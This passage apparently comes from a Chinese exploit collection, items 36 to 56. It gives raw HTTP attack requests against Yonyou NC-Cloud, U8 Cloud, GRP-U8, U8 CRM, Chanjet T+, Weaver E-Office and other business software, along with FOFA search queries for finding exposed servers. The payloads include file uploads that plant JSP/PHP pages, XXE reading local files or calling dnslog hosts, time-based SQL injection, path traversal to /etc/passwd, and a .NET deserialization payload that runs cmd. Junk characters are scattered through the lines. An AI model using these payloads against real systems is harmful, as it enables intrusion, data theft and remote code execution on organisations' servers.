7 G8 U; ^ X+ r% b2 k# F0 Q5 U+ DPOST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.18 ?5 | C- I: ?: P9 B
Host: 203.25.218.166:8888
/ @( }) o7 @! Q# qUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info. k2 P% l5 A- ]8 K* R6 f& Z2 H/ ~
Accept-Encoding: gzip, deflate
% I- o1 y, T1 w- C7 cAccept: */*, d) X4 V5 f+ w: d' O2 H M
Connection: close: @5 E. D- O% R6 [2 y
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA! n) S7 ?( b+ Z
Content-Length: 1904 W# e7 g, e6 S( L7 h
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0
0 z6 y( P1 a4 K5 y
0 z% Z9 z' D& K9 F/ R--fd28cb44e829ed1c197ec3bc71748df00 M8 n. k: @7 F+ B4 ^7 s# F5 `
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"
/ H' ~8 M! `* i0 y
% s" L0 f' r0 f<%out.println(1111*1111);%>8 u! O4 ~& z6 \0 |. ]
--fd28cb44e829ed1c197ec3bc71748df0--
u+ V) l7 z$ X8 ^
; F: @) Q" B4 i9 y
5 t B: f: | R) A36. 用友NC-Cloud soapFormat XXE
, X/ Q9 a' O1 T$ h- n. W- J7 kFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
$ U# ]; B4 B2 ]( H _. LPOST /uapws/soapFormat.ajax HTTP/1.1
0 \) ?6 u, p; OHost: 192.168.40.130:8989
4 H% u* `. E. {/ N7 t4 H8 xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
5 z* N; c) C: oContent-Length: 263
& H' f6 {9 [8 O# U; a5 `Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.80 A/ F' B, e$ P: k/ c0 J5 V
Accept-Encoding: gzip, deflate5 X) E# P# N" W8 O7 K$ t- h6 n
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 v% }' L! \: h3 }) r$ B( Q9 c, x2 RConnection: close
% K, O, x/ _5 u% s$ x/ ~2 cContent-Type: application/x-www-form-urlencoded$ J1 k9 |% R, c i
Upgrade-Insecure-Requests: 14 K8 |1 j- s4 R R8 P- X
5 O2 v* `1 P" n. {; o j( [9 f' i
msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a
+ x, f+ g L1 G$ W" f: u; Q h
/ d3 j$ U0 V* ?* f( c, r4 N1 }; B; ~2 a) ?
37. 用友NC-Cloud IUpdateService XXE
7 e+ x! C! q/ Q6 _% SFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"9 ~& I1 P4 _; r( ^9 l( b
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
, l. y$ x* V! b" o( {) p2 O4 x1 DHost: 192.168.40.130:89890 @3 J7 b% y" g9 K
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
5 i; I8 }1 {, q" ^, CContent-Length: 421
# `4 E8 D6 @5 U0 GAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 H) ~7 v* y1 J5 n
Accept-Encoding: gzip, deflate# K- k; A) f: p0 m- K# k* B: a
Accept-Language: zh-CN,zh;q=0.9, m1 m/ t7 C9 N2 o% S2 p- K( f
Connection: close* `1 \% V7 Y/ e# \6 Y
Content-Type: text/xml;charset=UTF-8# |( |7 S2 I f. I
SOAPAction: urn:getResult4 v' G( l2 M1 R; ~- L0 S* Z
Upgrade-Insecure-Requests: 1
/ l- L; v" W6 B3 M
0 K7 Q+ {) u4 F# f1 g<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">5 y- k* A/ ]7 E* o/ @2 y
<soapenv:Header/>
) v- D& U4 H$ n% m! R' y<soapenv:Body>! m0 q8 b: l) Z5 d& p$ p$ @) F
<iup:getResult>, Z4 p. E# d% q, ^
<!--type: string-->
4 R: ?6 k" g/ z<iup:string><![CDATA[
% N" \$ B% i! @0 X<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>& B; i/ r2 K5 {9 C
<xxx/>]]></iup:string>
8 ~. W) a. i6 s9 Z8 ^# \8 B</iup:getResult>3 [: h0 l, _$ r% k
</soapenv:Body>1 T& v# ?: L I/ E
</soapenv:Envelope>% W# V* ], i! s! \
2 |" j8 | o/ y- e9 f( O1 T: Z7 ~% U1 X
6 x. k+ \+ l; ]0 q$ J38. 用友U8 Cloud smartweb2.RPC.d XXE
% Y+ H4 X' i S' AFOFA:app="用友-U8-Cloud": U- O: M2 W& }' r. Z, y7 L! S
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1) v$ ?* h% k s2 W' E+ m" v. R+ R
Host: 192.168.40.131:8088
& a9 N+ ^$ M/ P k8 q& F e* [User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25$ j& t) h' w+ q: i* f, I- W, W
Content-Length: 260, M G$ k. I! j: N8 ~+ {
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
) U# w2 O: Z4 V3 b6 B% iAccept-Encoding: gzip, deflate
- u s2 |/ A7 l% _Accept-Language: zh-CN,zh;q=0.9
" }! K4 n! @ O* T$ M9 ]( g4 @" ~Connection: close! L! a& c5 n: U! T/ d: E
Content-Type: application/x-www-form-urlencoded
( T; Q/ Z! b/ v" P* W$ f4 ^; V3 S6 P) Z
__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>
5 J ?- H! x8 w& p) n: l. Y. g) l* o7 h) e o3 F; `
0 J# ^0 [- ~# o. t0 l$ s1 c+ ~ k7 _, f
39. 用友U8 Cloud RegisterServlet SQL注入
, l7 T0 ^$ n0 ?! I, h, N" R0 Q P. F5 fFOFA:title="u8c"
0 F7 L* k+ N. N* R/ |4 \( fPOST /servlet/RegisterServlet HTTP/1.1
0 U: E) _. C* d( e% F3 d+ B+ y |Host: 192.168.86.128:8089* M6 S/ P5 K7 a( E2 _" M6 y" a! e4 [
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
0 u3 F- v4 `4 k! q) g7 NConnection: close
" T$ p/ J0 M4 V; {Content-Length: 85
! y. P/ }- y7 G3 o; T* jAccept: */*
/ W( J) r3 y& A! D# EAccept-Language: en: p3 X" v, y9 o- A' P
Content-Type: application/x-www-form-urlencoded; U( I. s) A( n1 v. M
X-Forwarded-For: 127.0.0.10 E. I6 l3 D3 X
Accept-Encoding: gzip
% o4 ^5 U& S; H. @0 Y2 Y* y9 B/ H2 U6 P. k& e6 G3 b
usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--7 `) O6 q) z5 J% f p! G1 T) x" b
8 Q1 V+ e* |6 }6 l/ ^6 q$ c
5 f6 R( D5 p* H* x3 `3 w! D4 G40. 用友U8-Cloud XChangeServlet XXE3 Z/ |3 P( j3 I3 d' _7 c
FOFA:app="用友-U8-Cloud"; B. L" q; o* |8 m, I
POST /service/XChangeServlet HTTP/1.1
/ G% x {+ _: j8 y4 [3 jHost: x.x.x.x
; o$ L/ D# V+ {4 \* |6 dUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
* q" f' V9 R* NContent-Type: text/xml4 j# V* D/ h* a* C) j. d; g
Connection: close
9 Z9 O) U7 r- e/ P* A0 w2 I5 j: \' e& o8 g. B
<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r> B( F8 w. b$ G7 u- W3 O
( [1 w: M: Z+ E0 m/ l, l5 g0 P0 i
; K% g4 f! W& {+ _
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入' q' N$ `1 o9 D4 i9 S
FOFA:app="用友-U8-Cloud"! d: n$ W: ^9 v) G [) U' i' C
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
) E+ H6 W b1 T8 h! bHost:
: u2 M4 P L' NUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
1 K1 \9 J6 M* W7 dContent-Type: application/json
9 N7 O' c3 K+ `7 R2 |Accept-Encoding: gzip+ M w+ z5 u0 K7 M0 @) |
Connection: close
3 V6 T: v5 i! L4 _5 E* J, l% R: Z. o7 p9 }. `
5 A0 A/ ^) k- Y5 T42. 用友GRP-U8 SmartUpload01 文件上传
# L" q. Y1 @; x3 Q. }$ R" ?FOFA:app="用友-GRP-U8"( A- {" J2 h3 j
POST /u8qx/SmartUpload01.jsp HTTP/1.1( X# M1 u, ]7 S( y0 x# D
Host: x.x.x.x0 h& C! N. H' x( b
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
' s- M4 ]4 \. K1 X- MUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
" ?' a. d: J1 A, B( b* I3 `8 H% s: I5 |: }* Q5 i
PAYLOAD
$ @! M e1 r/ [: |3 N2 ^. _* f* ?% w4 y% Z8 v' I1 r
% k4 v: ]8 q1 g3 ?: j7 U1 L
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml
) A- U% Y* y2 G% ]& M- m1 T8 W9 ^" ]5 O5 Q5 e ]5 M1 }
43. 用友GRP-U8 userInfoWeb SQL注入致RCE
7 S. j2 G" J1 k" yFOFA:app="用友-GRP-U8"/ c1 g" p1 d( ` w0 ]
POST /services/userInfoWeb HTTP/1.1! q* f3 D! p) A
Host: your-ip
) m; Z6 x8 K# p: ~2 WUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
_3 E, k8 y. A8 v" J% K p7 IAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' x: h9 ?/ V- Z3 v2 D+ Q
Accept-Encoding: gzip, deflate8 J' T1 z) T! r$ ]2 @! h/ d5 s/ [
Accept-Language: zh-CN,zh;q=0.9
% R7 p2 U0 I9 r) S0 \' DConnection: close0 r/ I0 x& m& ~3 K( O1 U
SOAPAction:
) \+ x" ?& ]7 Y/ _3 x% hContent-Type: text/xml;charset=UTF-8. k4 L6 b0 E/ b7 s
( L& O4 J" z+ F: r<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
* {7 S; F/ K5 Y. O1 D% p0 ]7 @& M <soapenv:Header/>
8 j- N' O7 k5 }) L" \; N <soapenv:Body>3 W/ z3 e L3 ?9 D# L: e1 r( i" X
<ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">8 E6 O# M/ u- K8 ]8 m% z W
<userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>, }8 v8 I& T" P
</ser:getUserNameById>
& \) U" \9 C( w! U( l </soapenv:Body>
1 o) O" f8 f) M: c! x2 P</soapenv:Envelope>% f, F1 A% M0 e% {
0 L( h% w* M+ s
8 ` E g$ Z) }6 f' |/ G
44. 用友GRP-U8 bx_dj_check.jsp SQL注入" V; S+ {. O4 V& }- D1 ]5 K
FOFA:app="用友-GRP-U8"
# l3 K1 _ T6 RGET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1% G# W5 `9 x* l v) Z
Host: your-ip
; r' V9 A! h: M# _' ]User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
% H0 E k9 k5 C+ b" ^Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
! B- \4 _) N' q5 g& ^Accept-Encoding: gzip, deflate
' i& f2 ]9 `. k/ D" c# yAccept-Language: zh-CN,zh;q=0.9
( P) r7 z0 M! x" M9 ~- n$ z/ eConnection: close. ?5 F* b8 \% ~5 W: `6 i
, R$ Z! m/ ~. D( L
2 F9 S5 ?5 _, s+ u' A45. 用友GRP-U8 ufgovbank XXE* E" N0 u( f4 T5 }( ^4 d
FOFA:app="用友-GRP-U8"
) \& v1 U8 t0 o! R8 K. J/ M1 fPOST /ufgovbank HTTP/1.1
7 @: K) i7 `) SHost: 192.168.40.130:2223 d# V5 |! |3 `# \3 E: N
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0+ a7 ]- l+ S1 o _% y4 ]* D# E
Connection: close
" q+ H/ q% j% L' J- S- e/ ^0 ^% i! QContent-Length: 161/ l+ T7 R# d" C5 D7 C5 E, U
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8% O$ D$ Z- f# H$ N
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
4 h) ?6 O. ^' ~& D5 t4 H. dContent-Type: application/x-www-form-urlencoded' Y; `4 [: _5 V
Accept-Encoding: gzip
, p2 n$ b9 ]+ Q, ^$ J8 z: W
7 v' H, S4 O3 L6 R, N) A) H) ^/ n1 e. [* WreqData=<?xml version="1.0"?>- b" o# r" j2 P6 }5 H
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest9 D' q- w* `# F7 J' t0 `
A. z* o) F! q( U1 Q" i% ?7 _
% N: B) S" p4 R, \8 z$ g46. 用友GRP-U8 sqcxIndex.jsp SQL注入
/ C$ G( Q! F$ ?9 r3 m9 {/ o/ z$ `FOFA:app="用友-GRP-U8"
n; s1 V" E* u+ ^* O7 ]GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1- R+ I) h& {/ k, _ i; }$ G
Host: your-ip: D$ R( t6 W* x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
* m8 k4 E4 U- G3 a$ c0 ~& CAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.72 P* x' R2 _# X% J0 r+ V. d8 F
Accept-Encoding: gzip, deflate
# A. v! \: \# DAccept-Language: zh-CN,zh;q=0.9" K4 j4 y5 \2 o/ d# F* D: ^$ ?/ M
Connection: close D ]7 k4 M# d: L5 m! E3 t* T
6 w5 {$ W2 i0 ^& m1 r) T, U- e) z! @3 W
47. 用友GRP A++Cloud 政府财务云 任意文件读取, z( s* ?; P3 w( V/ z% `
FOFA:body="/pf/portal/login/css/fonts/style.css" @# |6 g7 L& u% p8 v5 z1 ]
GET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1
* q, z. V% _- U Z( {0 ]! BHost: x.x.x.x
1 M# z6 x7 N1 h" c, XCache-Control: max-age=0* w i4 q6 ?" w. @+ d: d& M4 E
Upgrade-Insecure-Requests: 1( z: k8 B2 X4 ]% q) g( G% x2 V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36, f7 b9 [. F4 ~9 m% [2 i
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7! o+ F5 O( L# `3 p! C5 U6 C
Accept-Encoding: gzip, deflate, br. r ]% U i$ x! Q. ^
Accept-Language: zh-CN,zh;q=0.94 E2 c- u2 n% ]8 ^
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
6 i5 d% I. U/ V: q: ]' YConnection: close
: Z; p. c* y) M7 P; H8 _# }/ H( {5 r( S& y. p
0 ?: B( H+ f1 o* Z' o- C; H
, L" i+ a/ W: B. Q/ L u8 q! _48. 用友U8 CRM swfupload 任意文件上传
: w8 r# c5 P1 R A$ P8 qFOFA:title="用友U8CRM"8 C# O) L7 D, O* j) J
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1: p. ^ l% y% x! x
Host: your-ip( z& t1 J+ p, l4 Q, |. @% w. c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.08 m. @4 l8 P; h% t. N# b
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.86 p9 z0 L1 `. T8 N5 U8 c
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
. e3 m2 }- d% DAccept-Encoding: gzip, deflate/ _2 F d# A3 s
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855
* ]4 D8 y8 x& a- I+ S b% W+ ^$ Z------2695209672394068716424300668551 |3 |' S/ U" |2 y! m5 J+ k3 d
Content-Disposition: form-data; name="file"; filename="s.php"
1 k. V, A- Y( J Z% D% A1231
& A6 A# D( x$ P' J3 d5 I" }+ f6 jContent-Type: application/octet-stream
+ E; n* @6 G8 A------269520967239406871642430066855( p5 S- x: g: ]: |7 _9 _6 j
Content-Disposition: form-data; name="upload": v. X9 ^7 i! `8 y5 v
upload
! P" p5 U# |2 ~! m; U& {------269520967239406871642430066855--
& ^. o t1 A3 E2 N. z+ k
1 P# L5 t/ g- t
1 l( ^( l. T# H- r49. 用友U8 CRM系统uploadfile.php接口任意文件上传# O9 n1 A; v, N5 j0 R5 V7 U3 N! Y2 V
FOFA:body="用友U8CRM") s5 f% E+ q9 X B$ C. ?
) Z& _- c1 e0 b: p$ T, J
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1# e# b) h( Z7 C# t$ `) I( b
Host: x.x.x.x
( z8 x% w) k. \ ?3 |6 OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
- ], @2 N. \: j0 xContent-Length: 329
4 M8 K* s2 H. JAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.85 f3 \" }$ K& i& N s. w
Accept-Encoding: gzip, deflate2 c" f |4 X+ t H( _
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
% a: d4 C& Q9 QConnection: close, B# U$ z# _- ]+ P
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w9 H7 C; M) F# t) [: K: ?
. ^: e+ E7 ?' q3 q \0 j' ~-----------------------------vvv3wdayqv3yppdxvn3w2 t! Z- S# f% I# q
Content-Disposition: form-data; name="file"; filename="%s.php "
. L) {% I- F/ c, d7 V4 RContent-Type: application/octet-stream# N( q A2 x+ }- M
& p @4 T" e* n& l6 hwersqqmlumloqa7 H# f8 F7 ]/ L& t2 Z4 X3 _
-----------------------------vvv3wdayqv3yppdxvn3w9 ]2 @# U- P1 }
Content-Disposition: form-data; name="upload"
/ t) H! w+ z B2 Y# p! }" F( z, a
9 o6 |. P7 ?! ^1 q2 jupload
/ X! w7 l5 p0 `, h-----------------------------vvv3wdayqv3yppdxvn3w--
E8 G! R+ h4 H( ]3 ^' d: t; d9 C( [ { i& q
; E& A2 c7 W7 K; v7 }
http://x.x.x.x/tmpfile/updB3CB.tmp.php1 x1 S d8 }. A) A
5 r" A- \6 u4 ]7 j. G
50. QDocs Smart School 6.4.1 filterRecords SQL注入) a( v, E- d5 y* Z
FOFA:body="close closebtnmodal"% S3 V3 b# X) c. ^3 T) m0 p, U! h
POST /course/filterRecords/ HTTP/1.1
: H) k" p# r6 I5 R$ V% R( RHost: x.x.x.x
- p3 C( c4 u3 Q$ c% s% CUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
. N# ]& N4 C9 d4 M* UConnection: close! r+ c) j/ o2 m3 D
Content-Length: 224( D: ]5 x& R* U- r t6 F
Accept: */*
4 g8 |0 |* K# H+ x9 [. Y# y7 SAccept-Language: en+ I8 [% ~! P( n/ {+ P% Z4 b
Content-Type: application/x-www-form-urlencoded7 d2 _6 O+ X6 O2 i/ t
Accept-Encoding: gzip
+ S3 P& a* S6 x& M, T& I- G( _6 h5 H% m2 m* r0 G$ \8 q. U% k1 l
searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1
- O7 [( Q9 ?* s3 o1 W8 Q# g4 }6 Q& U- M
) r6 z( i) d# G% E' V
. y. R- e- x, [1 Y' `0 z( v51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
; S% R) y4 T( h# J2 {0 x5 D" @FOFA:app="云时空社会化商业ERP系统"
5 G$ V9 l) S! A/ k$ n6 E2 V' J4 TGET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
% x4 u/ ?1 c# q9 {6 `5 THost: your-ip
5 [5 V4 b) e) j# x8 W# t, GUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36" R& H3 `7 C1 I; c
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 o9 `" D9 B* \. s* E
Accept-Encoding: gzip, deflate2 ?: @( F" m: g5 u3 n* p4 o$ g% q
Accept-Language: zh-CN,zh;q=0.9
) \0 y; q4 z4 W0 q. L4 yConnection: close/ Q" s# r5 R& R! M
0 v/ c- b4 ]0 z5 ?
$ [9 e) x* H6 I# C+ l* }+ D7 p0 ~: e52. 泛微E-Office json_common.php sql注入+ L2 i& }! V9 {+ F. d
FOFA:app="泛微-EOffice"
4 P" L; H5 d+ y/ C1 F' [0 F, qPOST /building/json_common.php HTTP/1.12 {/ Z1 y& [/ r' p& e( W* p
Host: 192.168.86.128:8097
+ Z$ W( _ ?* @/ n4 x# FUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.362 S# g. ] K; z! J, P2 V) {! H
Connection: close& Y* E7 ~* h6 k S
Content-Length: 87
- Z2 W6 B! U* _" v" G$ QAccept: */*
* V) |# `4 @/ v) p. U$ `Accept-Language: en
/ M8 Y& Q$ B' n, e4 EContent-Type: application/x-www-form-urlencoded) }+ E! B, ]2 |$ @8 w2 I
Accept-Encoding: gzip8 g# d9 e/ z5 z- M9 a% y
5 x$ N, f! ^, m% ?9 F7 ?
tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333. Q% x. P: K" s8 D- Z7 Q* K" [3 M
4 m% Z/ x0 _* l4 p; t
) P4 _3 ]. s: ~' F
53. 迪普 DPTech VPN Service 任意文件上传0 M$ \8 R! c: x
FOFA:app="DPtech-SSLVPN"
4 q$ i% O& r, o/ F1 `/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
. I; |( x; |5 K g# J: ^- h
% j4 G, A1 K2 B* _9 a2 N
7 n4 w }' d1 e8 v54. 畅捷通T+ getstorewarehousebystore 远程代码执行( g$ y* _' C( `* t
FOFA:app="畅捷通-TPlus"2 U, H8 \+ n+ s$ H
第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件5 ? M' N* E5 X7 b: V" E+ a5 ]3 ~# N
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
4 x4 S7 Y: F6 ~- C, S% s7 Q$ n# p# h6 O' B
3 }$ V/ u; ~( x2 N' a Y完整数据包
7 J! \* y: P, W8 O. Z9 H* aPOST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1% B \6 g- D" F/ _' q) \
Host: x.x.x.x
- }8 p8 X; l/ P9 N# U0 s' N- mUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F9 D D' P% K5 l9 B: o
Content-Length: 593+ H3 H& |2 V: m3 g
0 R- |4 C4 @$ T- T C; m, u3 U* ?{0 F; o% `' f5 p; ~" S
"storeID":{
5 g/ N) r/ ?- `$ m! `1 V "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
4 N8 z- R6 F/ X, f, e "MethodName":"Start",
9 I* R0 y# R/ S0 Y. g0 u4 ?- g "ObjectInstance":{
# U, [; C3 e, {2 x4 h: M "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
& \$ `7 ?3 w. Q9 q3 t- O# @ "StartInfo":{: ^- T2 f' X& \% z: R7 j/ u" K" _& A
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",3 I, v" B" W& S8 N- _7 F
"FileName":"cmd",
& U6 \) T2 b6 W9 w- N "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"! i7 S7 S5 D1 h
}, m5 n9 d$ \1 [. E0 V* Z& p/ m7 j
}; {, n: ]5 y" x. C& N+ `& X
}
7 Q, v, d- o$ m4 }" `0 k}7 v8 R+ a N" W
g7 A g. R2 Y, d( _2 \9 Z0 ~8 o0 r- k# ?( K9 K, h+ A: {
第二步,访问如下url5 w* R8 e5 M6 z p! ]# |
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt. a3 N. R6 d: h/ [0 f
8 m: a5 w l, J6 m8 ]8 b
, J! J% I" t9 ^
55. 畅捷通T+ getdecallusers信息泄露2 n6 v3 N/ D; m9 E. _; C* F6 G6 ]
FOFA:app="畅捷通-TPlus"
" g( P( V; e: Y$ s" |# ` {, i第一步,通过2 M4 e, R5 x# W7 D- ^- q. z2 E
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie
# H/ Y% `3 w* g9 ]7 \ t2 ^第二步,利用获取到的Cookie请求9 `" K, M! }6 ^' Z' T B
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers, H9 n/ T0 x4 A4 {+ k/ G
3 X. J5 H8 u3 V; S56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
1 ]- z. ~- R0 U% Y& J' G* F2 K. c7 EFOFA: app="畅捷通-TPlus"# t; l) V* }' j' I% |3 a
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
